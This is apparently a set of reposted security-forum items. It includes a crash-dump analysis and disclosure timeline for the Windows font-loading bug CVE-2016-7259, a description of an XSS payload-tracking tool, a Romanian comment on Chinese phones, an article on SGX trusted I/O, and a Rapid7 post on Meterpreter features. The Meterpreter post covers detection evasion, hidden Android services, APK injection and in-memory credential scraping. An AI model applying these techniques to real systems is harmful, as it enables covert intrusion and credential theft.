for Test.exe *** ERROR: Module load completed but symbols could not be loaded for Test.exe Probably caused by : win32k.sys ( win32k!PUBLIC_PFTOBJ::bLoadFonts+ffffffffffffff33 ) Followup: MachineOwner --------- nt!RtlpBreakWithStatusInstruction: 8216a9f4 cc int 3 1: kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* KMODE_EXCEPTION_NOT_HANDLED (1e) This is a very common bugcheck. Usually the exception address pinpoints the driver/function that caused the problem. Always note this address as well as the link date of the driver/image that contains this address. Arguments: Arg1: c0000005, The exception code that was not handled Arg2: 8e3c7280, The address that the exception occurred at Arg3: 00000000, Parameter 0 of the exception Arg4: 00000018, Parameter 1 of the exception Debugging Details: ------------------ BUGCHECK_P1: ffffffffc0000005 BUGCHECK_P2: ffffffff8e3c7280 BUGCHECK_P3: 0 BUGCHECK_P4: 18 READ_ADDRESS: 00000018 EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. FAULTING_IP: win32k!PUBLIC_PFTOBJ::bLoadFonts+ffffffffffffff33 8e3c7280 f6411808 test byte ptr [ecx+18h],8 EXCEPTION_PARAMETER2: 00000018 BUGCHECK_STR: 0x1E_c0000005_R CPU_COUNT: 4 CPU_MHZ: db6 CPU_VENDOR: GenuineIntel CPU_FAMILY: 6 CPU_MODEL: 3a CPU_STEPPING: 9 DEFAULT_BUCKET_ID: WIN8_DRIVER_FAULT PROCESS_NAME: ConsoleApplica CURRENT_IRQL: 0 ANALYSIS_VERSION: 10.0.10240.9 x86fre EXCEPTION_RECORD: a8815898 -- (.exr 0xffffffffa8815898) ExceptionAddress: 8e3c7280 (win32k!PUBLIC_PFTOBJ::bLoadFonts+0xffffff33) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 00000018 Attempt to read from address 00000018 TRAP_FRAME: a8815974 -- (.trap 0xffffffffa8815974) ErrCode = 00000000 eax=00000000 ebx=00000000 ecx=00000000 edx=00c295b0 esi=9ee20398 edi=00000002 eip=8e3c7280 esp=a88159e8 ebp=a8815a4c iopl=0 nv up ei pl nz na po nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202 win32k!PUBLIC_PFTOBJ::bLoadFonts+0xffffffff`ffffff33: 8e3c7280 f6411808 test byte ptr [ecx+18h],8 ds:0023:00000018=?? Resetting default scope LAST_CONTROL_TRANSFER: from 821e6aeb to 8216a9f4 STACK_TEXT: a8814ee4 821e6aeb 00000003 6296f150 00000065 nt!RtlpBreakWithStatusInstruction a8814f38 821e6605 8303f340 a8815338 a881536c nt!KiBugCheckDebugBreak+0x1f a881530c 821695c6 0000001e c0000005 8e3c7280 nt!KeBugCheck2+0x676 a8815330 821694fd 0000001e c0000005 8e3c7280 nt!KiBugCheck2+0xc6 a8815350 821e479b 0000001e c0000005 8e3c7280 nt!KeBugCheckEx+0x19 a881536c 8217f672 a8815898 8226f180 a8815460 nt!KiFatalExceptionHandler+0x1a a8815390 8217f644 a8815898 8226f180 a8815460 nt!ExecuteHandler2+0x26 a8815450 820fa3bd a8815898 a8815460 00010037 nt!ExecuteHandler+0x24 a881587c 8217b156 a8815898 00000000 a8815974 nt!KiDispatchException+0x101 a88158e8 8217d99b 00000000 00000000 00000000 nt!KiDispatchTrapException+0x4e a88158e8 8e3c7280 00000000 00000000 00000000 nt!KiTrap0E+0x1a7 a8815a4c 8e3c0bb8 8da41000 000000d8 00000002 win32k!PUBLIC_PFTOBJ::bLoadFonts+0xffffff33 a8815aac 8e3c0aee 00000002 00000011 00000000 win32k!GreAddFontResourceWInternal+0xa3 a8815bf4 8217a417 00a65558 000000d8 00000002 win32k!NtGdiAddFontResourceW+0xbc a8815bf4 77bcca70 00a65558 000000d8 00000002 nt!KiSystemServicePostCall 002ee75c 75e1b67c 75e1adfb 00a65558 000000d8 ntdll!KiFastSystemCallRet 002ee760 75e1adfb 00a65558 000000d8 00000002 GDI32!NtGdiAddFontResourceW+0xa 002ee7a0 75e4993b 002ee7d4 00000011 00000000 GDI32!GdiAddFontResourceW+0x5b 002ee9f8 01024b8b 00415b70 00000010 00000000 GDI32!AddFontResourceExA+0xeb WARNING: Stack unwind information not available. Following frames may be wrong. 002ef4d0 01029314 002b02d4 0000003f 00322540 Test+0x84b8b 002ef7d0 0107763a 00000003 00322518 00322820 Test+0x89314 002ef81c 0107781d 002ef838 76074198 7fd66000 Test+0xd763a 002ef824 76074198 7fd66000 76074170 fa31b76d Test+0xd781d 002ef838 77bb2cb1 7fd66000 fa4bb319 00000000 KERNEL32!BaseThreadInitThunk+0x24 002ef880 77bb2c7f ffffffff 77bde751 00000000 ntdll!__RtlUserThreadStart+0x2b 002ef890 00000000 0100b103 7fd66000 00000000 ntdll!_RtlUserThreadStart+0x1b STACK_COMMAND: kb FOLLOWUP_IP: win32k!PUBLIC_PFTOBJ::bLoadFonts+ffffffffffffff33 8e3c7280 f6411808 test byte ptr [ecx+18h],8 SYMBOL_STACK_INDEX: b SYMBOL_NAME: win32k!PUBLIC_PFTOBJ::bLoadFonts+ffffffffffffff33 FOLLOWUP_NAME: MachineOwner MODULE_NAME: win32k IMAGE_NAME: win32k.sys DEBUG_FLR_IMAGE_TIMESTAMP: 577fb612 IMAGE_VERSION: 6.3.9600.18405 BUCKET_ID_FUNC_OFFSET: ffffffffffffff33 FAILURE_BUCKET_ID: 0x1E_c0000005_R_win32k!PUBLIC_PFTOBJ::bLoadFonts BUCKET_ID: 0x1E_c0000005_R_win32k!PUBLIC_PFTOBJ::bLoadFonts PRIMARY_PROBLEM_CLASS: 0x1E_c0000005_R_win32k!PUBLIC_PFTOBJ::bLoadFonts ANALYSIS_SOURCE: KM FAILURE_ID_HASH_STRING: km:0x1e_c0000005_r_win32k!public_pftobj::bloadfonts FAILURE_ID_HASH: {de897383-506f-34a6-612f-9272467400a7} Followup: MachineOwner --------- Analysis The faulty syscall is win32k!NtGdiAddFontResourceW. According to Reactos source code the function prototype is: __kernel_entry INT W32KAPI APIENTRY NtGdiAddFontResourceW( _In_reads_(cwc) WCHAR *pwszFiles, _In_ ULONG cwc, _In_ ULONG cFiles, _In_ FLONG f, _In_ DWORD dwPidTid, _In_opt_ DESIGNVECTOR *pdv); The crash happens on a NULL pointer dereference in the win32k!PUBLIC_PFTOBJ::bLoadFonts function: 1: kd> .trap 0xffffffffa8815974 ErrCode = 00000000 eax=00000000 ebx=00000000 ecx=00000000 edx=00c295b0 esi=9ee20398 edi=00000002 eip=8e3c7280 esp=a88159e8 ebp=a8815a4c iopl=0 nv up ei pl nz na po nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202 win32k!PUBLIC_PFTOBJ::bLoadFonts+0xffffffff`ffffff33: 8e3c7280 f6411808 test byte ptr [ecx+18h],8 ds:0023:00000018=?? The previous line is: ; in win32k!PUBLIC_PFTOBJ::bLoadFonts .text:001A827D mov ecx, [esi+eax*4] ; ecx = nullptr Register configuration is as follows: ESI register points to a kernel pool memory block. EAX register is the number file passed to the syscall (win32k!NtGdiAddFontResourceW) in the 1st argument. Note: multiple file names can be passed to the syscall with the | separator character. EDI is the number of files passed in the 1st argument of the syscall. The kernel pool memory block (where the null pointer lies) is allocated and has a size of 0x90 bytes: 1: kd> !pool @esi Pool page 9ee20398 region is Paged session pool 9ee20000 size: 338 previous size: 0 (Allocated) Gfnt 9ee20338 size: 10 previous size: 338 (Free) Free 9ee20348 size: 48 previous size: 10 (Allocated) Ussm *9ee20390 size: 90 previous size: 48 (Allocated) *Gffv Pooltag Gffv : Gdi FONTFILEVIEW 9ee20420 size: 68 previous size: 90 (Allocated) Usqm 9ee20488 size: 288 previous size: 68 (Allocated) Gla5 9ee20710 size: 8f0 previous size: 288 (Allocated) Gla1 The kernel pool memory block is allocated in the same function (win32k!PUBLIC_PFTOBJ::bLoadFonts): ; in win32k!PUBLIC_PFTOBJ::bLoadFonts .text:001A8449 mov ecx, edi ; ecx = edi = number of files = 2 ; [...] .text:001A844F mov edx, 'vffG' ; block tag .text:001A8454 lea eax, ds:7[edi*4] ; lea eax,[edi*4+7] ; edi = 2 ; eax = 0x0f .text:001A845B shl ecx, 6 ; before: ecx = 2; after: ecx = 0x80 .text:001A845E and eax, 0FFFFFFF8h ; eax = 8 .text:001A8461 push 1 .text:001A8463 add ecx, eax ; NumberOfBytes: 0x80 + 8 = 0x88 .text:001A8465 mov [esp+64h+var_28], eax .text:001A8469 call PALLOCMEM2(x,x,x) .text:001A846E mov [esp+60h+pFontFileView], eax ; kernel pool block pointer Then the win32k!vLoadFontFileView function is called: ; in win32k!PUBLIC_PFTOBJ::bLoadFonts .text:001A8539 push [esp+80h+pFontFileView] ; unsigned __int16 * .text:001A853D call vLoadFontFileView Inside win32k!vLoadFontFileView, both of the font files (*.pfm and *.pfb) are loaded and then mapped. The mapping occurs in thewin32k!MapFontFiles function. ; in win32k!vLoadFontFileView .text:0018D5BD push [ebp+arg_C] ; 1: kd> dp 9efb2a90 .text:0018D5BD ; 9efb2a90 00000000 00000000 00000000 00000000 .text:0018D5C0 mov edx, [ebp+arg_0] ; 1: kd> dd 8d9f1108 .text:0018D5C0 ; 8d9f1108 8d9f1110 8d9f1150 00000000 00000000 .text:0018D5C3 mov ecx, ebx ; ebx = ecx = 2 (number of files) .text:0018D5C5 push [ebp+arg_8] ; points on P .text:0018D5C8 call MapFontFiles(ulong,_FONTFILEVIEW * *,void * *,ulong *) The call stack on win32k!MapFontFiles function entry looks like this: 3: kd> k # ChildEBP RetAddr 00 8a4e7988 8e1805cd win32k!MapFontFiles 01 8a4e79bc 8e19b542 win32k!vLoadFontFileView+0x18a 02 8a4e7a4c 8e194bb8 win32k!PUBLIC_PFTOBJ::bLoadFonts+0x1f5 03 8a4e7aac 8e194aee win32k!GreAddFontResourceWInternal+0xa3 04 8a4e7bf4 81574417 win32k!NtGdiAddFontResourceW+0xbc Inside win32k!MapFontFiles we have a loop that maps both of the font files using the win32k!EngMapFontFileFDInternal function: ; in win32k!MapFontFiles .text:001A1CAA add eax, ecx ; 2nd -> eax = 9efb2a9c .text:001A1CAC mov edx, ecx .text:001A1CAE push 0 .text:001A1CB0 push eax .text:001A1CB1 mov eax, [ebp+var_4] .text:001A1CB4 mov ecx, [ecx+eax] .text:001A1CB7 call EngMapFontFileFDInternal(x,x,x,x) .text:001A1CBC test eax, eax ; eax = 0 on 2nd pass .text:001A1CBE jz @@ErrorMapFontFile .text:001A1CC4 mov ecx, [ebp+arg_0] ; 1: kd> dp 9efb2a90 .text:001A1CC4 ; 9efb2a90 00b70000 00000000 000002f3 00000000 .text:001A1CC4 ; 9efb2aa0 46140003 38616c47 010807fe 00000001 .text:001A1CC4 ; 9efb2ab0 80000000 00000000 00008208 00000000 .text:001A1CC7 inc edi .text:001A1CC8 mov eax, [ebp+var_C] ; 8 .text:001A1CCB add ecx, 4 .text:001A1CCE mov [ebp+arg_0], ecx .text:001A1CD1 cmp edi, [ebp+number_of_files] ; 2 .text:001A1CD4 jb short loc_1A1CAA ; 2nd -> eax = 9efb2a9c The first loop pass is used to open and map the *.pfm font file, the second one being used for the *.pfb file. In w32k!EngMapFontFileFDInternal we have a call to win32k!bCreateSection: ; in w32k!EngMapFontFileFDInternal .text:00142AB9 mov ecx, [ebx+28h] ; du poi(@ebx + 28) .text:00142AB9 ; 8da41000 "\??\C:\WORK\FONTS\TEST\FONTS\LIB" .text:00142AB9 ; 8da41040 "TEST63.PFB" .text:00142AB9 ; .text:00142ABC shr eax, 3 .text:00142ABF and al, 1 .text:00142AC1 movzx eax, al .text:00142AC4 push eax ; int (0) .text:00142AC5 lea eax, [esp+74h+var_5C] .text:00142AC9 push eax ; struct _FILEVIEW * .text:00142ACA push esi ; unsigned __int16 * (0) .text:00142ACB call bCreateSection(ushort *,_FILEVIEW *,int,int *,uchar) Inside win32k!bCreateSection, the code uses nt!IoCreateFile. Here (after the call to open the file), the resulting handle refers to the *.pfb file: !handle 80000bf8 PROCESS 9dcd2040 SessionId: 1 Cid: 0af0 Peb: 7f58c000 ParentCid: 0e58 DirBase: 00e08540 ObjectTable: af8583c0 HandleCount: <Data Not Accessible> Image: FontLoader.exe Kernel handle Error reading handle count. 80000bf8: Object: ab226d70 GrantedAccess: 001200a9 Entry: a47827f0 Object: ab226d70 Type: (8023c868) File ObjectHeader: ab226d58 (new version) HandleCount: 1 PointerCount: 1 Directory Object: 00000000 Name: \Work\fonts\test\fonts\Test-Italic63.pfb {HarddiskVolume2} The code then uses nt!ZwQueryInformationFile to query file information. Note that the code doesn't check if the file size is 0. ; in win32!bCreateSection .text:000DC47B lea eax, [ebp+FileInformation] .text:000DC47E push 5 ; FileInformationClass .text:000DC480 push 18h ; Length .text:000DC482 push eax ; FileInformation .text:000DC483 lea eax, [ebp+IoStatusBlock] .text:000DC486 push eax ; IoStatusBlock .text:000DC487 push [ebp+FileHandle] ; FileHandle .text:000DC48A call edi ; ZwQueryInformationFile(x,x,x,x,x) The code then calls win32k!ZwWin32CreateSection which is merely a wrapper around nt!ZwCreateSection: ; in win32k!bCreateSection .text:000DC548 mov [ebp+ObjectAttributes.Length], 18h .text:000DC552 mov [ebp+ObjectAttributes.RootDirectory], ebx .text:000DC558 mov [ebp+ObjectAttributes.Attributes], 200h .text:000DC562 mov [ebp+ObjectAttributes.ObjectName], ebx .text:000DC568 mov [ebp+ObjectAttributes.SecurityDescriptor], ebx .text:000DC56E mov [ebp+ObjectAttributes.SecurityQualityOfService], ebx .text:000DC574 test cl, 2 .text:000DC577 jnz loc_21098C .text:000DC57D push ecx ; int .text:000DC57E push ecx ; int .text:000DC57F push [ebp+FileHandle] ; FileHandle .text:000DC582 neg esi .text:000DC584 lea eax, [ebp+MaximumSize] .text:000DC587 push ecx ; int .text:000DC588 sbb esi, esi .text:000DC58A lea ecx, [ebp+var_60] ; int .text:000DC58D and esi, 0FFFFFFE4h .text:000DC590 add esi, 20h .text:000DC593 push esi ; SectionPageProtection .text:000DC594 push eax ; MaximumSize .text:000DC595 lea eax, [ebp+ObjectAttributes] .text:000DC59B push eax ; ObjectAttributes .text:000DC59C call ZwWin32CreateSection(x,x,x,x,x,x,x,x,x) ; fail inside!!! .text:000DC5A1 test eax, eax ; HRESULT indicates error .text:000DC5A3 js loc_21091E ; take jcc The code can't create a section of an empty file, which results in an error code. The file handle is then closed and an error is signaled by zeroing the eax register: ; in win32k!bCreateSection .text:0021091E push [ebp+FileHandle] ; Handle .text:00210921 call ds:ZwClose(x) .text:00210927 .text:00210927 loc_210927: .text:00210927 xor eax, eax ; function returns 0 .text:00210929 jmp loc_DC613 ; go to function epilogue The 0 return value is still seen as an error by the caller (win32k!EngMapFontFileFDInternal) which also exits: ; in win32k!EngMapFontFileFDInternal .text:00142ACB call bCreateSection(ushort *,_FILEVIEW *,int,int *,uchar) .text:00142AD0 mov [esp+70h+ret_val], eax ; [...] .text:00142AE4 mov eax, [esp+70h+ret_val] .text:00142AE8 .text:00142AE8 loc_142AE8: .text:00142AE8 test eax, eax .text:00142AEA jz loc_142B77 ; to function epilogue Back to win32k!MapFontFiles on the call site to win32k!EngMapFontFileFDInternal. We can see that a 0 return value is also taken as an error. The file is then unmapped and the first pointer sized value in the font file view (pointer by the esi register) is also zeroed. This value corresponds to the file mapping. ; in win32k!MapFontFiles .text:001A1CB7 call EngMapFontFileFDInternal(x,x,x,x) .text:001A1CBC test eax, eax ; eax = 0 on 2nd pass .text:001A1CBE jz @@ErrorMapFontFile ; [...] .text:00230C89 @@ErrorMapFontFile: .text:00230C89 test edi, edi .text:00230C8B jz short loc_230CAC .text:00230C8D sub ebx, esi .text:00230C8F sub [ebp+arg_4], esi .text:00230C92 .text:00230C92 loc_230C92: .text:00230C92 push dword ptr [esi] .text:00230C94 call EngUnmapFontFileFD(x) ; unmap file .text:00230C99 mov eax, [ebp+arg_4] .text:00230C9C xor ecx, ecx .text:00230C9E mov [esi], ecx ; esi=pFontFileView ; ecx = 0 .text:00230CAC loc_230CAC: .text:00230CAC xor al, al ; exits with 0 The function then exits (with a zero value, indicating an error) and we are back to win32k!vLoadFontFileView. Inside this function the return code is checked and the win32k!vLoadFontFileView function also exits but the error code is not backported to the caller (PUBLIC_PFTOBJ::bLoadFonts). ; in win32k!PUBLIC_PFTOBJ::bLoadFonts .text:001A853D call vLoadFontFileView .text:001A8542 mov eax, [esp+60h+p_minus_pfontfileview] ; eax = [a5861a34]=00000000 .text:001A8542 ; -------------------------- .text:001A8542 ; fonte file view first DWORD has been zeroed! .text:001A8542 ; 3: kd> dp 9e417dd8 L1 .text:001A8542 ; 9e417dd8 00000000 ; [...] .text:001A8570 .text:001A8570 loc_1A8570: .text:001A8570 cmp [esp+60h+var_ghsemPublicPFT], 0 ; [a5861a18]=00000000 .text:001A8575 jz loc_1A86FF ; clean up The file is unmapped once again but the pointer is 0: ; in win32k!PUBLIC_PFTOBJ::bLoadFonts .text:001A8710 push dword ptr [ebx+esi*4] ; 0 !!! .text:001A8713 call EngUnmapFontFileFD(x) And then the font file view is used again, but as the pointer is 0 the code tries to dereference the NULL address: ; in win32k!PUBLIC_PFTOBJ::bLoadFonts .text:001A8279 mov esi, [esp+60h+pFontFileView] .text:001A8279 ; note: first dword is 0 .text:001A8279 ; 1: kd> dp 9e417dd8 L4 .text:001A8279 ; 9e417dd8 00000000 9e417e20 1471fe00 01d13591 .text:001A827D .text:001A827D loc_1A827D: .text:001A827D mov ecx, [esi+eax*4] ; ecx is a NULL pointer .text:001A8280 test byte ptr [ecx+18h], 8 ; crash here!!! Version Information Windows version - Windows 8.1 Update 1 x86 [up to date on 2016-08-25]: 3: kd> vertarget Windows 8.1 Kernel Version 9600 MP (4 procs) Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Built by: 9600.18379.x86fre.winblue_ltsb.160614-0600 Machine Name: Kernel base = 0x8160b000 PsLoadedModuleList = 0x81805618 Debug session time: Thu Aug 25 16:03:28.779 2016 (UTC + 2:00) System Uptime: 0 days 0:12:29.534 Win32k.sys module information: 3: kd> lm vm win32k Browse full module list start end module name 8e234000 8e59b000 win32k (pdb symbols) g:\symbols\win32k.pdb\ACF8092B8851410DBBB1D0C026BFCCAE2\win32k.pdb Loaded symbol image file: win32k.sys Image path: \SystemRoot\System32\win32k.sys Image name: win32k.sys Browse all global symbols functions data Timestamp: Fri Jul 08 16:17:54 2016 (577FB612) CheckSum: 003599F0 ImageSize: 00367000 File version: 6.3.9600.18405 Product version: 6.3.9600.18405 File flags: 0 (Mask 3F) File OS: 40004 NT Win32 File type: 3.7 Driver File date: 00000000.00000000 Translations: 0409.04b0 CompanyName: Microsoft Corporation ProductName: Microsoft Windows Operating System InternalName: win32k.sys OriginalFilename: win32k.sys ProductVersion: 6.3.9600.18405 FileVersion: 6.3.9600.18405 (winblue_ltsb.160708-0600) FileDescription: Multi-User Win32 Driver LegalCopyright: Microsoft Corporation. All rights reserved. Detection The file format of the font itself is not in cause. You should check for any PostScript Type 1 font (*.pfm extension) font file and its associated *.pfb file. If the *.pfb file is empty (file size is 0 byte), then the crash can occur. Mitigation NULL pointer dereference protection on newer Windows systems will mitigate this problem as it is not possible to allocate the page at 0. CVE Number MITRE: CVE-2016-7259 Microsoft: Microsoft Security Bulletin MS16-151 Time Line 2015-12-xx: [QB] Vulnerability found; Pushed for later thorough analysis 2016-08-25: [QB] Vulnerability unstacked and analyzed 2016-08-26: [QB] Report vulnerability to Microsoft 2016-08-26: [MS] Microsoft acknowledge reception 2016-09-15: [MS] Microsoft has a successful repro 2016-11-02: [QB] Ask if they deemed the bug as being important or not 2016-11-10: [MS] Acknowledge fix will be released in Dec. patch Tuesday 2016-12-13: [MS] Fix for CVE-2016-7259 is released 2016-12-14: [QB] Quick look at the patch and blog release Sursa: http://blog.quarkslab.com/cve-2016-7259-an-empty-file-into-the-blue.html

Sleepy Puppy What is Sleepy Puppy? Sleepy Puppy is a cross-site scripting (XSS) payload management framework which simplifies the ability to capture, manage, and track XSS propagation over long periods of time. Why Should I use Sleepy Puppy? Often when testing for client side injections (HTML/JS/etc.) security engineers are looking for where the injection occurs within the application they are testing only. While this provides ample coverage for the application in scope, there is a possibility that the code engineers are injecting may be reflected back in a completely separate application. Sleepy Puppy helps facilitate inter-application XSS testing by providing JavaScript payloads that callback to the Sleepy Puppy application. This allows tracking when/where a payload fires even if the execution is triggered by a different user, occurs in a different application, or happens long after the initial test was performed. These payloads and the "PuppyScripts" (which are often JavaScripts) that define them are completely customizable, allowing you to capture only the information you need depending on your environment. Sursa: https://github.com/Netflix/sleepy-puppy

Ma bucur sa vad ca exista persoane ma pasionate de acest domeniu decat mine. Insa "exista brand-uri chinezesti bune" este, ca si parerea mea, o parere, doar ca e contradictorie. 1. Nu e atat de relevant ca sunt "facute in China". iOS-ul nu este facut in China (din cate stiu eu). Apoi, iPhone-ul si alte telefoane care se respecta nu vor instala niciodata backdoors sau software care sa fure tot ce poate dintr-un telefon (https://thehackernews.com/2016/11/hacking-android-smartphone.html) deoarece au un brand pe care vor sa il mentina. Nu stiu despre voi, dar eu nu vreau ca datele mele sa ajunga in China. 2. Observatia legata de AllView a fost facuta pe baza unor teste facute de mine pe vreo 2 telefoane AllView. Am fost multumit. 3. Nu toti vor sa cumpere un telefon si sa isi schimbe ROM-ul. Parintii tai sunt pasionati de root-area telefoanelor? Atunci da, inteleg. Apoi, am testat Cyanogen inca de la versiunile mai vechi si nu era tocmai stabil. Adica na, iau un telefon, pun Cyanogen ca e cool si nu imi merge Camera si aplicatia de mesaj. La urma urmei, cine are nevoie de ele cat timp nu mai am bloatware? 4. Daca tu este multumit de o chinezarie, nu inseamna ca trebuie sa fim si noi. PS: Rusine tie. Nu aduce acuze doar pentru ca cineva nu are aceleasi pareri ca tine.

Researchers work to save trusted computing apps from keyloggers SGX needs I/O protection, Austrian boffins reckon 5 Jan 2017 at 06:35, Richard Chirgwin Intel's Software Guard Extensions started rolling in Skylake processors in October 2015, but it's got an Achilles heel: insecure I/O like keyboards or USB provide a vector by which sensitive user data could be compromised. A couple of boffins from Austria's Graz University of Technology reckon they've cracked that problem, with an add-on that creates protected I/O paths on top of SGX. Instead of the handful of I/O technologies directly protected by SGX – most of which have to do with DRM rather than user security – the technology proposed in Samuel Weiser and Mario Werner's Arxiv paper, SGXIO, is a “generic” trusted I/O that can be applied to things like keyboards, USB devices, screens and so on. And we're not talking about a merely esoteric technology that might soothe the fears of people running cloud apps on multi-tenant infrastructure. The Weiser/Werner proposal would create an SGX-supported trusted path all the way to a remote user's browser to protect (for example) an online banking session – and provide “attestation mechanisms to enable the bank as well as the user to verify that trusted paths are established and functional.” SGXIO as a way to protect a banking app The shortcoming SGXIO is trying to fix is that SGX's threat model considers everything outside itself a threat (which isn't a bad thing, in context). The usual approach for trusted paths is to use encrypted interfaces. The paper mentions the Protected Audio Video Path (PAVP) – but that's a DRM-specific example, and most I/O devices don't encrypt anything. Hence SGXIO, an attempt to add a generic trusted path to the SGX environment – and with that trusted path reaching to the end user environment, it's an attempt to protect an application from nasties like keyloggers that a miscreant might have installed on a victim's box. The key architectural concepts in SGXIO are: A trusted stack – which contains a security hypervisor, secure I/O drivers, and the trusted boot (TB) enclave; and The virtual machine – hosting an untrusted operating system that runs secure user applications. A user application communicating with the end user: 1. Opens an encrypted channel to the secure I/O driver; 2. This tunnels through the untrusted operating system, and establishes secure communication with the “generic” user I/O device. The hypervisor binds user devices exclusively to I/O; I/O on unprotected devices passes directly through the hypervisor; the trusted path names both the encrypted user-app-to-driver communication; and the exclusive driver-to-device binding; The TB enclave provides assurance of the trusted path setup, by attesting the hypervisor. The paper illustrates this process like this: SGXIO's trusted stack components An implementation wouldn't be seamless: the SGXIO paper devices a fair chunk of copy to application design, enclave programming (fortunately something Intel provides resources for), driver design, and hypervisor choice. Application developers, for example, have to work out a key exchange mechanism (Diffie-Hellman is supported, and SGXIO offers its own lightweight key protocol). For hypervisors, the paper suggests the seL4 microkernel. Originally developed by Australia's NICTA and now handled by the CSIRO Data61 project, seL4 is a mathematically verified software kernel that was published as open source software in 2014. SGXIO will get its first public airing at the CODASPY'17 conference in March, being held in Scottsdale Arizona. ® Sursa: http://www.theregister.co.uk/2017/01/05/researchers_work_to_save_trusted_computing_apps_from_keyloggers/

12 Days of HaXmas: Meterpreter's new Shiny for 2016 Blog Post created by Brent Cook on Jan 5, 2017 Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we’re highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. Editor's Note: Yes, this is technically an extra post to celebrate the 12th day of HaXmas. We said we liked gifts! Happy new year! It is once again time to reflect on Metasploit's new payload gifts of 2016 and to make some new resolutions. We had a lot of activity with Metasploit's payload development team, thanks to OJ Reeves, Spencer McIntyre, Tim Wright, Adam Cammack, danilbaz, and all of the other contributors. Here are some of the improvements that made their way into Meterpreter this year. On the first day of Haxmas, OJ gave us an Obfuscated Protocol Beginning the new year with a bang (and an ABI break), we added simple obfuscation to the underlying protocol that Meterpreter uses when communicating with Metasploit framework. While it is just a simple XOR encoding scheme, it still stumped a number of detection tools, and still does today. In the game of detection cat-and-mouse, security vendors often like to pick on the open source project first, since there is practically no reverse engineering required. It is doubly surprising that this very simple technique continues to work today. Just be sure to hide that stager On the second day of Haxmas, Tim gave us two Android Services Exploiting mobile devices is exciting, but a mobile session does not have the same level of always-on connectivity as an always-on server session does. It is easy to lose a your session because a phone went to sleep, there was a loss of network connectivity, or the payload was swapped for some other process. While we can't do much about networking, we did take care of the process swapping by adding the ability for Android meterpreter to automatically launch as a background service. This means that not only does it start automatically, it does not show up as a running task, and is able to run in a much more resilient and stealthy way. On the third day of Haxmas, OJ gave us three Reverse Port Forwards While exploits have been able to pivot server connections into a remote network through a session, Metasploit did not have the ability for a user to run a local tool and perform the same function. Now you can! Whether it's python responder or just a web server, you can now setup a locally-visible service via a Meterpreter session that visible to your target users. This is a nice complement to standard port forwarding that has been available with Meterpreter sessions for some time. On the fourth day of Haxmas, Tim gave us four Festive Wallpapers Sometimes, when on an engagement, you just want to know 'who did I own?'. Looking around, it is not always obvious, and popping up calc.exe isn't always visible from afar, especially with those new-fangled HiDPI displays. Now Metasploit lets you change the background image on OS X, Windows and Android desktops. You can now update everyone's desktop with a festive picture of your your choosing. On the fifth day of Haxmas, OJ gave us five Powershell Prompts Powershell has been Microsoft's gift both to Administrators and Penetration Test/Red Teams. While it adds a powerful amount of capabilities, it is difficult to run powershell as a standalone process using powershell.exe within a Meterpreter session for a number of reasons: it sets up its own console handling, and can even be disabled or removed from a system. This is where the Powershell Extension for Meterpreter comes in. It not only makes it possible to confortably run powershell commands from Meterpreter directly, you can also interface directly with Meterpreter straight from powershell. It uses the capaibilites built in to all modern Windows system libraries, so it even works if powershell.exe is missing from the system. Best of all, it never drops a file to disk. If you haven't checked it out already, make it your resolution to try out the Meterpreter powershell extension in 2017. On the sixth day of Haxmas, Tim gave us six SQLite Queries Mobile exploitation is fun for obtaining realtime data such as GPS coordinates, local WiFi access points, or even looking through the camera. But, getting data from applications can be trickier. Many Android applications use SQLite for data storage however, and armed with the combination of a local privilege escalation (of which there are now several for Android), you can now peruse local application data directly from within an Android session. On the seventh day of Haxmas, danilbaz gave us seven Process Images This one is for the security researchers and developers. Originally part of the Rekall forensic suite, winpmem allows you to automatically dump the memory image for a remote process directly back to your Metasploit console for local analysis. A bit more sophisticated than the memdump command that has shipped with Metasploit since the beginning of time, it works with many versions of Windows, does not require any files to be uploaded, and automatically takes care of any driver loading and setup. Hopefully we will also have OS X and Linux versions ready this coming year as well. On the eight day of Haxmas, Tim gave us eight Androids in Packages The Android Meterpreter payload continues to get more full-featured and easy to use. Stageless support now means that Android Meterpreter can now run as a fully self-contained APK, and without the need for staging, you can now save scarce bandwidth in mobile environments. APK injection means you can now add Meterpreter as a payload on existing Android applications, even resigning them with the signature of the original publisher. It even auto-obfuscates itself with Proguard build support. On the ninth day of Haxmas, zeroSteiner gave us nine Resilient Serpents Python Meterpreter saw a lot of love this year. In addition to a number of general bugfixes, it is now much more resilient on OS X and Windows platforms. On Windows, it can now automatically identify the Windows version, whether from Cygwin or as a native application. From OS X, reliability is greatly improved by avoiding using some of the more fragile OS X python extensions that can cause the Python interpreter to crash. On the tenth day of Haxmas, OJ gave us ten Universal Handlers Have you ever been confused about what sort of listener you should use on an engagement? Not sure if you'll be using 64-bit or 32-bit Linux when you target your hosts? Fret no more, the new universal HTTP payload, aka multi/meterpreter/reverse_http(s), now allows you to just set it and forget it. On the eleventh day of Haxmas, Adam and Brent gave us eleven Posix Payloads Two years ago, I started working at Rapid7 as a payloads specialist, and wrote this post (https://community.rapid7.com/community/metasploit/blog/2015/01/05/maxing-meterpr eters-mettle) outlining my goals for the year. Shortly after, I got distracted with a million other amazing Metasploit projects, but still kept the code on the back burner. This year, Adam, myself, and many others worked on the first release of Mettle, a new Posix Meterpreter with an emphasis on portability and performance. Got a SOHO router? Mettle fits. Got an IBM Mainframe? Mettle works there too! OSX, FreeBSD, OpenBSD? Well it works as well. Look forward to many more improvements in the Posix and embedded post-exploitation space, powered by the new Mettle payload. On the twelfth day of Haxmas, OJ gave us twelve Scraped Credentials Have you heard? Meterpreter now has the latest version of mimikatz integrated as part of the kiwi extension, which allows all sorts of credential-scraping goodness, supporting Windows XP through Server 2016. As a bonus, it still runs completely in memory for stealty operation. It is now easier than ever to keep Meterpreter up-to-date with upstream thanks to some nice new hooking capabilities in Mimikatz itself. Much thanks to gentilkiwi and OJ for the Christmas present. Hope your 2017 is bright and look forward to many more gifts 